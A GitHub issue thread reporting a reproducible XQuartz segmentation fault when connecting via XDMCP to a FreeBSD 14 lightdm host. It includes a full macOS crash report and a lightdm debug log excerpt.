### ISSUE TITLE
Consistent crash with FreeBSD lightdm via XDMCP

### ISSUE THREAD

**Issue by lgadallah-korio** [XQuartz/XQuartz#406]
I am running XQuartz with a command like this `/opt/X11/bin/Xquartz -query <host_ip>` where <host_ip> is a FreeBSD 14 amd64 box running lightdm with XDMCP enabled:

```
$ lightdm --version
lightdm 1.32.0
```

After a few seconds and some switching of windows, the lightdm login screen appears. After logging in and waiting a bit, the remote xfce desktop can be seen, but within a minute or two there is a crash. An example dump is below:

```
-------------------------------------
Translated Report (Full Report Below)
-------------------------------------

Process:               X11.bin [96564]
Path:                  /Applications/Utilities/XQuartz.app/Contents/MacOS/X11.bin
Identifier:            X11.bin
Version:               ???
Code Type:             X86-64 (Native)
Parent Process:        launchd [1]
User ID:               501

Date/Time:             2024-08-30 20:28:07.2151 -0700
OS Version:            macOS 12.7.6 (21H1320)
Report Version:        12
Anonymous UUID:        39387C56-DC8F-7EBF-8699-83EA7707594E

Sleep/Wake UUID:       A7289F52-7E15-47F1-BD5D-886135BE99B9

Time Awake Since Boot: 400000 seconds
Time Since Wake:       15702 seconds

System Integrity Protection: enabled

Crashed Thread:        2

Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x0000000000000000
Exception Codes:       0x0000000000000001, 0x0000000000000000
Exception Note:        EXC_CORPSE_NOTIFY

Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
Terminating Process:   exc handler [96564]

VM Region Info: 0 is not in any region.  Bytes before following region: 4459909120
      REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      __TEXT                      109d4d000-109ec5000    [ 1504K] r-x/r-x SM=COW  ...MacOS/X11.bin

Thread 0::  Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib        	    0x7ff80e4e593a mach_msg_trap + 10
1   libsystem_kernel.dylib        	    0x7ff80e4e5ca8 mach_msg + 56
2   CoreFoundation                	    0x7ff80e5e929d __CFRunLoopServiceMachPort + 319
3   CoreFoundation                	    0x7ff80e5e7928 __CFRunLoopRun + 1276
4   CoreFoundation                	    0x7ff80e5e6d6c CFRunLoopRunSpecific + 562
5   HIToolbox                     	    0x7ff8172995e6 RunCurrentEventLoopInMode + 292
6   HIToolbox                     	    0x7ff81729934a ReceiveNextEventCommon + 594
7   HIToolbox                     	    0x7ff8172990e5 _BlockUntilNextEventMatchingListInModeWithFilter + 70
8   AppKit                        	    0x7ff811025aa9 _DPSNextEvent + 927
9   AppKit                        	    0x7ff811024166 -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 1394
10  AppKit                        	    0x7ff811016818 -[NSApplication run] + 586
11  X11.bin                       	       0x109d56a36 X11ApplicationMain + 1226
12  X11.bin                       	       0x109d5f58b server_main + 188
13  X11.bin                       	       0x109d53be3 do_start_x11_server + 275
14  X11.bin                       	       0x109d53147 _Xstart_x11_server + 122
15  X11.bin                       	       0x109d53298 mach_startup_server + 79
16  libsystem_kernel.dylib        	    0x7ff80e4eb9a6 mach_msg_server + 355
17  X11.bin                       	       0x109d541a0 main + 1421
18  dyld                          	       0x10f64252e start + 462

Thread 1:
0   libsystem_pthread.dylib       	    0x7ff80e51df48 start_wqthread + 0

Thread 2 Crashed:
0   X11.bin                       	       0x109df086b damageRegionAppend + 330
1   X11.bin                       	       0x109df1a84 damageCopyArea + 399
2   X11.bin                       	       0x109d627c6 RootlessCopyArea + 395
3   X11.bin                       	       0x109dffd90 present_copy_region + 197
4   X11.bin                       	       0x109e007c4 present_execute_copy + 138
5   X11.bin                       	       0x109e01afb present_execute + 728
6   X11.bin                       	       0x109e00ad6 present_fake_do_timer + 74
7   X11.bin                       	       0x109e5cead DoTimer + 37
8   X11.bin                       	       0x109e5cfd3 DoTimers + 61
9   X11.bin                       	       0x109e5cce6 WaitForSomething + 429
10  X11.bin                       	       0x109da70d1 Dispatch + 189
11  X11.bin                       	       0x109db0af8 dix_main + 970
12  X11.bin                       	       0x109d5f4c8 server_thread + 38
13  libsystem_pthread.dylib       	    0x7ff80e5224e1 _pthread_start + 125
14  libsystem_pthread.dylib       	    0x7ff80e51df6b thread_start + 15

Thread 3:: com.apple.NSEventThread
0   libsystem_kernel.dylib        	    0x7ff80e4e593a mach_msg_trap + 10
1   libsystem_kernel.dylib        	    0x7ff80e4e5ca8 mach_msg + 56
2   CoreFoundation                	    0x7ff80e5e929d __CFRunLoopServiceMachPort + 319
3   CoreFoundation                	    0x7ff80e5e7928 __CFRunLoopRun + 1276
4   CoreFoundation                	    0x7ff80e5e6d6c CFRunLoopRunSpecific + 562
5   AppKit                        	    0x7ff811193572 _NSEventThread + 132
6   libsystem_pthread.dylib       	    0x7ff80e5224e1 _pthread_start + 125
7   libsystem_pthread.dylib       	    0x7ff80e51df6b thread_start + 15

Thread 4:
0   libsystem_kernel.dylib        	    0x7ff80e4e83aa __psynch_cvwait + 10
1   libsystem_pthread.dylib       	    0x7ff80e522a6f _pthread_cond_wait + 1249
2   X11.bin                       	       0x109d5cbd4 DarwinProcessFDAdditionQueue_thread + 172
3   libsystem_pthread.dylib       	    0x7ff80e5224e1 _pthread_start + 125
4   libsystem_pthread.dylib       	    0x7ff80e51df6b thread_start + 15

Thread 5:
0   libsystem_kernel.dylib        	    0x7ff80e4e83aa __psynch_cvwait + 10
1   libsystem_pthread.dylib       	    0x7ff80e522a6f _pthread_cond_wait + 1249
2   libXplugin.1.dylib            	    0x7ffb26ee82c4 _xp_async_dequeue + 50
3   libXplugin.1.dylib            	    0x7ffb26ee8355 _xp_async_thread + 82
4   libsystem_pthread.dylib       	    0x7ff80e5224e1 _pthread_start + 125
5   libsystem_pthread.dylib       	    0x7ff80e51df6b thread_start + 15

Thread 6:
0   libsystem_pthread.dylib       	    0x7ff80e51df48 start_wqthread + 0


Thread 2 crashed with X86 Thread State (64-bit):
  rax: 0x00006000029ddd00  rbx: 0x00007faf89823700  rcx: 0x000000000000036c  rdx: 0x0000000000000000
  rdi: 0x0000000000000000  rsi: 0x0000000000000000  rbp: 0x000070000f647bc0  rsp: 0x000070000f647b30
   r8: 0x000000000000036c   r9: 0x000000000000036c  r10: 0x0000000000000000  r11: 0x0000000000000095
  r12: 0x0000000000000000  r13: 0x0000600002cfa300  r14: 0x0000000000000000  r15: 0x0000000000000000
  rip: 0x0000000109df086b  rfl: 0x0000000000010246  cr2: 0x0000000000000000
  
Logical CPU:     2
Error Code:      0x00000004 (no mapping for user data read)
Trap Number:     14

Thread 2 instruction stream:
  83 c0 00 00 00 30 0f 84-35 02 00 00 44 89 75 90  .....0..5...D.u.
  44 89 7d 8c 48 89 5d 80-48 8d 05 9e 8e 0f 00 48  D.}.H.].H......H
  8b 00 48 89 45 c0 48 8d-05 98 8e 0f 00 48 89 45  ..H.E.H......H.E
  c8 4d 85 ed 0f 84 bb 01-00 00 49 8b 45 00 48 89  .M........I.E.H.
  85 70 ff ff ff 48 8b 85-78 ff ff ff 83 38 00 7e  .p...H..x....8.~
  0b 41 83 7d 24 00 0f 84-8d 01 00 00 49 8b 55 38  .A.}$.......I.U8
 [8a]02 84 c0 0f 84 98 00-00 00 44 0f bf 7a 08 44  ..........D..z.D	<==
  0f bf 72 0a 3c 02 74 0e-0f bf 42 38 41 01 c7 0f  ..r.<.t...B8A...
  bf 42 3a 41 01 c6 83 7d-9c 00 75 0a 48 3b 55 80  .B:A...}..u.H;U.
  0f 84 8f 00 00 00 0f b7-42 0c 66 44 01 f8 0f b7  ........B.fD....
  4a 0e 66 44 01 f1 0f b7-c9 48 c1 e1 30 0f b7 c0  J.fD.....H..0...
  48 c1 e0 20 48 09 c8 44-89 f1 c1 e1 10 48 09 c1  H.. H..D.....H..

Binary Images:
    0x7ff80e4e4000 -     0x7ff80e51bfff libsystem_kernel.dylib (*) <2fe67e94-4a5e-3506-9e02-502f7270f7ef> /usr/lib/system/libsystem_kernel.dylib
    0x7ff80e569000 -     0x7ff80ea6bfff com.apple.CoreFoundation (6.9) <fdd28505-5456-3c40-a5ba-7890b064db39> /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
    0x7ff81726b000 -     0x7ff81755efff com.apple.HIToolbox (2.1.1) <913d3d2e-4e4c-3907-98fe-8f4abd551297> /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox
    0x7ff810fe7000 -     0x7ff811e76fff com.apple.AppKit (6.9) <5dd484cf-ed6a-3633-b42e-6518aeecd5b9> /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
       0x109d4d000 -        0x109ec4fff X11.bin (*) <c88def78-3b3c-3ab3-a26a-b12cec3d8c1f> /Applications/Utilities/XQuartz.app/Contents/MacOS/X11.bin
       0x10f63d000 -        0x10f6a8fff dyld (*) <eea022bb-a6ab-3cd1-8ac1-54ce8cfd3333> /usr/lib/dyld
    0x7ff80e51c000 -     0x7ff80e527fff libsystem_pthread.dylib (*) <5a5f7316-85b7-315e-baf3-76211ee65604> /usr/lib/system/libsystem_pthread.dylib
    0x7ffb26ee7000 -     0x7ffb26ef2fff libXplugin.1.dylib (*) <57b59dc7-6218-3b12-8365-b8c5abe85dfa> /usr/lib/libXplugin.1.dylib

External Modification Summary:
  Calls made by other processes targeting this process:
    task_for_pid: 0
    thread_create: 0
    thread_set_state: 0
  Calls made by this process:
    task_for_pid: 0
    thread_create: 0
    thread_set_state: 0
  Calls made by all processes on this machine:
    task_for_pid: 0
    thread_create: 0
    thread_set_state: 0

VM Region Summary:
ReadOnly portion of Libraries: Total=1.0G resident=0K(0%) swapped_out_or_unallocated=1.0G(100%)
Writable regions: Total=664.1M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=664.1M(100%)

                                VIRTUAL   REGION 
REGION TYPE                        SIZE    COUNT (non-coalesced) 
===========                     =======  ======= 
Accelerate framework               512K        4 
Activity Tracing                   256K        1 
CG backing stores                 11.8M       14 
CG image                           212K        7 
ColorSync                          224K       26 
CoreAnimation                     2460K       28 
CoreGraphics                        20K        3 
CoreUI image data                 1660K       14 
Foundation                          16K        1 
Kernel Alloc Once                    8K        1 
MALLOC                           253.6M       82 
MALLOC guard page                   32K        7 
MALLOC_NANO (reserved)           384.0M        1         reserved VM address space (unallocated)
Mach message                         8K        1 
STACK GUARD                       56.0M        7 
Stack                             11.0M        7 
VM_ALLOCATE                        144K       34 
__CTF                               756        1 
__DATA                            23.4M      403 
__DATA_CONST                      22.6M      235 
__DATA_DIRTY                       996K      138 
__FONT_DATA                          4K        1 
__GLSLBUILTINS                    5176K        1 
__LINKEDIT                       646.7M       21 
__OBJC_RO                         82.9M        1 
__OBJC_RW                         3200K        2 
__TEXT                           415.9M      420 
__UNICODE                          592K        1 
dyld private memory               1024K        1 
mapped file                      150.7M       20 
shared memory                      780K       18 
===========                     =======  ======= 
TOTAL                              2.0G     1501 
TOTAL, minus reserved VM space     1.7G     1501 



-----------
Full Report
-----------

{"app_name":"X11.bin","timestamp":"2024-08-30 20:28:07.00 -0700","app_version":"","slice_uuid":"c88def78-3b3c-3ab3-a26a-b12cec3d8c1f","build_version":"","platform":1,"share_with_app_devs":1,"is_first_party":1,"bug_type":"309","os_version":"macOS 12.7.6 (21H1320)","incident_id":"21D9E60A-7A9F-45C3-A37A-D13AC3060F47","name":"X11.bin"}
{
  "uptime" : 400000,
  "procLaunch" : "2024-08-30 20:27:15.8387 -0700",
  "procRole" : "Foreground",
  "version" : 2,
  "userID" : 501,
  "deployVersion" : 210,
  "modelCode" : "MacBookPro11,4",
  "procStartAbsTime" : 401792437362697,
  "coalitionID" : 21461,
  "osVersion" : {
    "train" : "macOS 12.7.6",
    "build" : "21H1320",
    "releaseType" : "User"
  },
  "captureTime" : "2024-08-30 20:28:07.2151 -0700",
  "incident" : "21D9E60A-7A9F-45C3-A37A-D13AC3060F47",
  "bug_type" : "309",
  "pid" : 96564,
  "procExitAbsTime" : 401843813666004,
  "cpuType" : "X86-64",
  "procName" : "X11.bin",
  "procPath" : "\/Applications\/Utilities\/XQuartz.app\/Contents\/MacOS\/X11.bin",
  "parentProc" : "launchd",
  "parentPid" : 1,
  "coalitionName" : "org.xquartz.X11",
  "crashReporterKey" : "39387C56-DC8F-7EBF-8699-83EA7707594E",
  "wakeTime" : 15702,
  "sleepWakeUUID" : "A7289F52-7E15-47F1-BD5D-886135BE99B9",
  "sip" : "enabled",
  "vmRegionInfo" : "0 is not in any region.  Bytes before following region: 4459909120\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      UNUSED SPACE AT START\n--->  \n      __TEXT                      109d4d000-109ec5000    [ 1504K] r-x\/r-x SM=COW  ...MacOS\/X11.bin",
  "isCorpse" : 1,
  "exception" : {"codes":"0x0000000000000001, 0x0000000000000000","rawCodes":[1,0],"type":"EXC_BAD_ACCESS","signal":"SIGSEGV","subtype":"KERN_INVALID_ADDRESS at 0x0000000000000000"},
  "termination" : {"flags":0,"code":11,"namespace":"SIGNAL","indicator":"Segmentation fault: 11","byProc":"exc handler","byPid":96564},
  "vmregioninfo" : "0 is not in any region.  Bytes before following region: 4459909120\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      UNUSED SPACE AT START\n--->  \n      __TEXT                      109d4d000-109ec5000    [ 1504K] r-x\/r-x SM=COW  ...MacOS\/X11.bin",
  "extMods" : {"caller":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"system":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"targeted":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"warnings":0},
  "faultingThread" : 2,
  "threads" : [{"id":2650850,"queue":"com.apple.main-thread","frames":[{"imageOffset":6458,"symbol":"mach_msg_trap","symbolLocation":10,"imageIndex":0},{"imageOffset":7336,"symbol":"mach_msg","symbolLocation":56,"imageIndex":0},{"imageOffset":524957,"symbol":"__CFRunLoopServiceMachPort","symbolLocation":319,"imageIndex":1},{"imageOffset":518440,"symbol":"__CFRunLoopRun","symbolLocation":1276,"imageIndex":1},{"imageOffset":515436,"symbol":"CFRunLoopRunSpecific","symbolLocation":562,"imageIndex":1},{"imageOffset":189926,"symbol":"RunCurrentEventLoopInMode","symbolLocation":292,"imageIndex":2},{"imageOffset":189258,"symbol":"ReceiveNextEventCommon","symbolLocation":594,"imageIndex":2},{"imageOffset":188645,"symbol":"_BlockUntilNextEventMatchingListInModeWithFilter","symbolLocation":70,"imageIndex":2},{"imageOffset":256681,"symbol":"_DPSNextEvent","symbolLocation":927,"imageIndex":3},{"imageOffset":250214,"symbol":"-[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:]","symbolLocation":1394,"imageIndex":3},{"imageOffset":194584,"symbol":"-[NSApplication run]","symbolLocation":586,"imageIndex":3},{"imageOffset":39478,"symbol":"X11ApplicationMain","symbolLocation":1226,"imageIndex":4},{"imageOffset":75147,"symbol":"server_main","symbolLocation":188,"imageIndex":4},{"imageOffset":27619,"symbol":"do_start_x11_server","symbolLocation":275,"imageIndex":4},{"imageOffset":24903,"symbol":"_Xstart_x11_server","symbolLocation":122,"imageIndex":4},{"imageOffset":25240,"symbol":"mach_startup_server","symbolLocation":79,"imageIndex":4},{"imageOffset":31142,"symbol":"mach_msg_server","symbolLocation":355,"imageIndex":0},{"imageOffset":29088,"symbol":"main","symbolLocation":1421,"imageIndex":4},{"imageOffset":21806,"symbol":"start","symbolLocation":462,"imageIndex":5}]},{"id":2650861,"frames":[{"imageOffset":8008,"symbol":"start_wqthread","symbolLocation":0,"imageIndex":6}]},{"triggered":true,"id":2650864,"instructionState":{"instructionStream":{"bytes":[131,192,0,0,0,48,15,132,53,2,0,0,68,137,117,144,68,137,125,140,72,137,93,128,72,141,5,158,142,15,0,72,139,0,72,137,69,192,72,141,5,152,142,15,0,72,137,69,200,77,133,237,15,132,187,1,0,0,73,139,69,0,72,137,133,112,255,255,255,72,139,133,120,255,255,255,131,56,0,126,11,65,131,125,36,0,15,132,141,1,0,0,73,139,85,56,138,2,132,192,15,132,152,0,0,0,68,15,191,122,8,68,15,191,114,10,60,2,116,14,15,191,66,56,65,1,199,15,191,66,58,65,1,198,131,125,156,0,117,10,72,59,85,128,15,132,143,0,0,0,15,183,66,12,102,68,1,248,15,183,74,14,102,68,1,241,15,183,201,72,193,225,48,15,183,192,72,193,224,32,72,9,200,68,137,241,193,225,16,72,9,193],"offset":96}},"threadState":{"r13":{"value":105553163428608},"rax":{"value":105553160166656},"rflags":{"value":66118},"cpu":{"value":2},"r14":{"value":0},"rsi":{"value":0},"r8":{"value":876},"cr2":{"value":0},"rdx":{"value":0},"r10":{"value":0},"r9":{"value":876},"r15":{"value":0},"rbx":{"value":140391903016704},"trap":{"value":14,"description":"(no mapping for user data read)"},"err":{"value":4},"r11":{"value":149},"rip":{"value":4460578923,"matchesCrashFrame":1},"rbp":{"value":123145560554432},"rsp":{"value":123145560554288},"r12":{"value":0},"rcx":{"value":876},"flavor":"x86_THREAD_STATE","rdi":{"value":0}},"frames":[{"imageOffset":669803,"symbol":"damageRegionAppend","symbolLocation":330,"imageIndex":4},{"imageOffset":674436,"symbol":"damageCopyArea","symbolLocation":399,"imageIndex":4},{"imageOffset":88006,"symbol":"RootlessCopyArea","symbolLocation":395,"imageIndex":4},{"imageOffset":732560,"symbol":"present_copy_region","symbolLocation":197,"imageIndex":4},{"imageOffset":735172,"symbol":"present_execute_copy","symbolLocation":138,"imageIndex":4},{"imageOffset":740091,"symbol":"present_execute","symbolLocation":728,"imageIndex":4},{"imageOffset":735958,"symbol":"present_fake_do_timer","symbolLocation":74,"imageIndex":4},{"imageOffset":1113773,"symbol":"DoTimer","symbolLocation":37,"imageIndex":4},{"imageOffset":1114067,"symbol":"DoTimers","symbolLocation":61,"imageIndex":4},{"imageOffset":1113318,"symbol":"WaitForSomething","symbolLocation":429,"imageIndex":4},{"imageOffset":368849,"symbol":"Dispatch","symbolLocation":189,"imageIndex":4},{"imageOffset":408312,"symbol":"dix_main","symbolLocation":970,"imageIndex":4},{"imageOffset":74952,"symbol":"server_thread","symbolLocation":38,"imageIndex":4},{"imageOffset":25825,"symbol":"_pthread_start","symbolLocation":125,"imageIndex":6},{"imageOffset":8043,"symbol":"thread_start","symbolLocation":15,"imageIndex":6}]},{"id":2650872,"name":"com.apple.NSEventThread","frames":[{"imageOffset":6458,"symbol":"mach_msg_trap","symbolLocation":10,"imageIndex":0},{"imageOffset":7336,"symbol":"mach_msg","symbolLocation":56,"imageIndex":0},{"imageOffset":524957,"symbol":"__CFRunLoopServiceMachPort","symbolLocation":319,"imageIndex":1},{"imageOffset":518440,"symbol":"__CFRunLoopRun","symbolLocation":1276,"imageIndex":1},{"imageOffset":515436,"symbol":"CFRunLoopRunSpecific","symbolLocation":562,"imageIndex":1},{"imageOffset":1754482,"symbol":"_NSEventThread","symbolLocation":132,"imageIndex":3},{"imageOffset":25825,"symbol":"_pthread_start","symbolLocation":125,"imageIndex":6},{"imageOffset":8043,"symbol":"thread_start","symbolLocation":15,"imageIndex":6}]},{"id":2650875,"frames":[{"imageOffset":17322,"symbol":"__psynch_cvwait","symbolLocation":10,"imageIndex":0},{"imageOffset":27247,"symbol":"_pthread_cond_wait","symbolLocation":1249,"imageIndex":6},{"imageOffset":64468,"symbol":"DarwinProcessFDAdditionQueue_thread","symbolLocation":172,"imageIndex":4},{"imageOffset":25825,"symbol":"_pthread_start","symbolLocation":125,"imageIndex":6},{"imageOffset":8043,"symbol":"thread_start","symbolLocation":15,"imageIndex":6}]},{"id":2650891,"frames":[{"imageOffset":17322,"symbol":"__psynch_cvwait","symbolLocation":10,"imageIndex":0},{"imageOffset":27247,"symbol":"_pthread_cond_wait","symbolLocation":1249,"imageIndex":6},{"imageOffset":4804,"symbol":"_xp_async_dequeue","symbolLocation":50,"imageIndex":7},{"imageOffset":4949,"symbol":"_xp_async_thread","symbolLocation":82,"imageIndex":7},{"imageOffset":25825,"symbol":"_pthread_start","symbolLocation":125,"imageIndex":6},{"imageOffset":8043,"symbol":"thread_start","symbolLocation":15,"imageIndex":6}]},{"id":2651018,"frames":[{"imageOffset":8008,"symbol":"start_wqthread","symbolLocation":0,"imageIndex":6}]}],
  "usedImages" : [
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 140703368626176,
    "size" : 229376,
    "uuid" : "2fe67e94-4a5e-3506-9e02-502f7270f7ef",
    "path" : "\/usr\/lib\/system\/libsystem_kernel.dylib",
    "name" : "libsystem_kernel.dylib"
  },
  {
    "source" : "P",
    "arch" : "x86_64h",
    "base" : 140703369170944,
    "CFBundleShortVersionString" : "6.9",
    "CFBundleIdentifier" : "com.apple.CoreFoundation",
    "size" : 5255168,
    "uuid" : "fdd28505-5456-3c40-a5ba-7890b064db39",
    "path" : "\/System\/Library\/Frameworks\/CoreFoundation.framework\/Versions\/A\/CoreFoundation",
    "name" : "CoreFoundation",
    "CFBundleVersion" : "1866"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 140703517028352,
    "CFBundleShortVersionString" : "2.1.1",
    "CFBundleIdentifier" : "com.apple.HIToolbox",
    "size" : 3096576,
    "uuid" : "913d3d2e-4e4c-3907-98fe-8f4abd551297",
    "path" : "\/System\/Library\/Frameworks\/Carbon.framework\/Versions\/A\/Frameworks\/HIToolbox.framework\/Versions\/A\/HIToolbox",
    "name" : "HIToolbox"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 140703413727232,
    "CFBundleShortVersionString" : "6.9",
    "CFBundleIdentifier" : "com.apple.AppKit",
    "size" : 15269888,
    "uuid" : "5dd484cf-ed6a-3633-b42e-6518aeecd5b9",
    "path" : "\/System\/Library\/Frameworks\/AppKit.framework\/Versions\/C\/AppKit",
    "name" : "AppKit",
    "CFBundleVersion" : "2113.65.150"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 4459909120,
    "size" : 1540096,
    "uuid" : "c88def78-3b3c-3ab3-a26a-b12cec3d8c1f",
    "path" : "\/Applications\/Utilities\/XQuartz.app\/Contents\/MacOS\/X11.bin",
    "name" : "X11.bin"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 4553166848,
    "size" : 442368,
    "uuid" : "eea022bb-a6ab-3cd1-8ac1-54ce8cfd3333",
    "path" : "\/usr\/lib\/dyld",
    "name" : "dyld"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 140703368855552,
    "size" : 49152,
    "uuid" : "5a5f7316-85b7-315e-baf3-76211ee65604",
    "path" : "\/usr\/lib\/system\/libsystem_pthread.dylib",
    "name" : "libsystem_pthread.dylib"
  },
  {
    "source" : "P",
    "arch" : "x86_64",
    "base" : 140716666679296,
    "size" : 49152,
    "uuid" : "57b59dc7-6218-3b12-8365-b8c5abe85dfa",
    "path" : "\/usr\/lib\/libXplugin.1.dylib",
    "name" : "libXplugin.1.dylib"
  }
],
  "sharedCache" : {
  "base" : 140703365595136,
  "size" : 19331678208,
  "uuid" : "246818c3-4b9f-3462-bcaf-fdf71975e5fe"
},
  "vmSummary" : "ReadOnly portion of Libraries: Total=1.0G resident=0K(0%) swapped_out_or_unallocated=1.0G(100%)\nWritable regions: Total=664.1M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=664.1M(100%)\n\n                                VIRTUAL   REGION \nREGION TYPE                        SIZE    COUNT (non-coalesced) \n===========                     =======  ======= \nAccelerate framework               512K        4 \nActivity Tracing                   256K        1 \nCG backing stores                 11.8M       14 \nCG image                           212K        7 \nColorSync                          224K       26 \nCoreAnimation                     2460K       28 \nCoreGraphics                        20K        3 \nCoreUI image data                 1660K       14 \nFoundation                          16K        1 \nKernel Alloc Once                    8K        1 \nMALLOC                           253.6M       82 \nMALLOC guard page                   32K        7 \nMALLOC_NANO (reserved)           384.0M        1         reserved VM address space (unallocated)\nMach message                         8K        1 \nSTACK GUARD                       56.0M        7 \nStack                             11.0M        7 \nVM_ALLOCATE                        144K       34 \n__CTF                               756        1 \n__DATA                            23.4M      403 \n__DATA_CONST                      22.6M      235 \n__DATA_DIRTY                       996K      138 \n__FONT_DATA                          4K        1 \n__GLSLBUILTINS                    5176K        1 \n__LINKEDIT                       646.7M       21 \n__OBJC_RO                         82.9M        1 \n__OBJC_RW                         3200K        2 \n__TEXT                           415.9M      420 \n__UNICODE                          592K        1 \ndyld private memory               1024K        1 \nmapped file                      150.7M       20 \nshared memory                      780K       18 \n===========                     =======  ======= \nTOTAL                              2.0G     1501 \nTOTAL, minus reserved VM space     1.7G     1501 \n",
  "legacyInfo" : {
  "threadTriggered" : {

  }
},
  "trialInfo" : {
  "rollouts" : [
    {
      "rolloutId" : "607844aa04477260f58a8077",
      "factorPackIds" : {
        "SIRI_MORPHUN_ASSETS" : "6103050cbfe6dc472e1c982a"
      },
      "deploymentId" : 240000066
    },
    {
      "rolloutId" : "6112e14f37f5d11121dcd519",
      "factorPackIds" : {
        "SIRI_TEXT_TO_SPEECH" : "634710168e8be655c1316aaa"
      },
      "deploymentId" : 240000231
    }
  ],
  "experiments" : [
    {
      "treatmentId" : "c47ab4cc-c9c3-4b5d-a87c-e2433ce02597",
      "experimentId" : "6639bc6ba73d460582162323",
      "deploymentId" : 400000006
    }
  ]
}
}

Model: MacBookPro11,4, BootROM 489.0.0.0.0, 4 processors, Quad-Core Intel Core i7, 2.2 GHz, 16 GB, SMC 2.29f24
Graphics: Intel Iris Pro, Intel Iris Pro, Built-In
Display: Color LCD, 2880 x 1800 Retina, Main, MirrorOff, Online
Memory Module: BANK 0/DIMM0, 8 GB, DDR3, 1600 MHz, 0x802C, 0x31364B544631473634485A2D314736453120
Memory Module: BANK 1/DIMM0, 8 GB, DDR3, 1600 MHz, 0x802C, 0x31364B544631473634485A2D314736453120
AirPort: spairport_wireless_card_type_wifi (0x14E4, 0x152), Broadcom BCM43xx 1.0 (7.77.111.1 AirPortDriverBrcmNIC-1710.4)
AirPort: 
Bluetooth: Version (null), 0 services, 0 devices, 0 incoming serial ports
Network Service: Wi-Fi, AirPort, en0
Serial ATA Device: APPLE SSD SM0256G, 251 GB
USB Device: USB30Bus
USB Device: Apple Internal Keyboard / Trackpad
USB Device: Bluetooth USB Host Controller
Thunderbolt Bus: MacBook Pro, Apple Inc., 27.1
```

FWIW, the FreeBSD is on Ethernet LAN, and the Macbook is on bridged WiFi to the same LAN.

Is this just too weird of a scenario for XQuartz to take on?

**Comment by lgadallah-korio** [comment]
A snippet from `/var/log/lightdm/lightdm.log` during the period of interest:

```
[+1708.14s] DEBUG: Got Query(authentication_names=[]) from 192.168.1.174:50805
[+1708.14s] DEBUG: Send Willing(authentication_name='' hostname='fbsd14' status='') to 192.168.1.174:50805
[+1709.15s] DEBUG: Got Query(authentication_names=[]) from 192.168.1.174:50805
[+1709.15s] DEBUG: Send Willing(authentication_name='' hostname='fbsd14' status='') to 192.168.1.174:50805
[+1709.26s] DEBUG: Got Request(display_number=0 connections=[192.168.1.174 100.96.0.2 fe80::411:783f:d84:ddc9 fdc4:cd85:e324:8d43:74:8515:cf64:60ac fe80::1446:75ff:fe09:babb fe80::799c:c4d8:5db5:f697 fe80::662d:19e1:3fa:e25e fe80::ce81:b1c:bd2c:69e] authentication_name='' authentication_data= authorization_names=['MIT-MAGIC-COOKIE-1' 'XDM-AUTHORIZATION-1'] manufacturer_display_id='') from 192.168.1.174:50805
[+1709.26s] DEBUG: Send Accept(session_id=60759 authentication_name='' authentication_data= authorization_name='MIT-MAGIC-COOKIE-1' authorization_data=3219D82C479BE3D29C6364BF61F11B7D) to 192.168.1.174:50805
[+1709.26s] DEBUG: Got Query(authentication_names=[]) from 192.168.1.174:50805
[+1709.26s] DEBUG: Send Willing(authentication_name='' hostname='fbsd14' status='') to 192.168.1.174:50805
[+1709.36s] DEBUG: Got Request(display_number=0 connections=[192.168.1.174 100.96.0.2 fe80::411:783f:d84:ddc9 fdc4:cd85:e324:8d43:74:8515:cf64:60ac fe80::1446:75ff:fe09:babb fe80::799c:c4d8:5db5:f697 fe80::662d:19e1:3fa:e25e fe80::ce81:b1c:bd2c:69e] authentication_name='' authentication_data= authorization_names=['MIT-MAGIC-COOKIE-1' 'XDM-AUTHORIZATION-1'] manufacturer_display_id='') from 192.168.1.174:50805
[+1709.36s] DEBUG: Send Accept(session_id=56157 authentication_name='' authentication_data= authorization_name='MIT-MAGIC-COOKIE-1' authorization_data=D73BCD588CC608DD96F846078DDE15B0) to 192.168.1.174:50805
[+1709.36s] DEBUG: Got Manage(session_id=56157 display_number=0 display_class='MIT-unspecified') from 192.168.1.174:50805
[+1709.36s] DEBUG: Seat xdmcp5: Loading properties from config section Seat:*
[+1709.36s] DEBUG: Seat xdmcp5: Starting
[+1709.36s] DEBUG: Seat xdmcp5: Creating greeter session
[+1709.36s] DEBUG: Seat xdmcp5: Creating display server of type x
[+1709.36s] DEBUG: DisplayServer: Connecting to XServer 192.168.1.174:0
[+1709.37s] DEBUG: Seat xdmcp5: Display server ready, starting session authentication
[+1709.37s] DEBUG: Session: Not setting XDG_VTNR
[+1709.37s] DEBUG: Session pid=31730: Started with service 'lightdm-greeter', username 'lightdm'
[+1709.37s] DEBUG: Registering seat with bus path /org/freedesktop/DisplayManager/Seat6
[+1709.38s] DEBUG: Session pid=31730: Authentication complete with return value 0: Success
[+1709.38s] DEBUG: Seat xdmcp5: Session authenticated, running command
[+1709.38s] DEBUG: Session pid=31730: Not setting XDG_VTNR
[+1709.38s] DEBUG: Session pid=31730: Running command /usr/local/sbin/lightdm-gtk-greeter
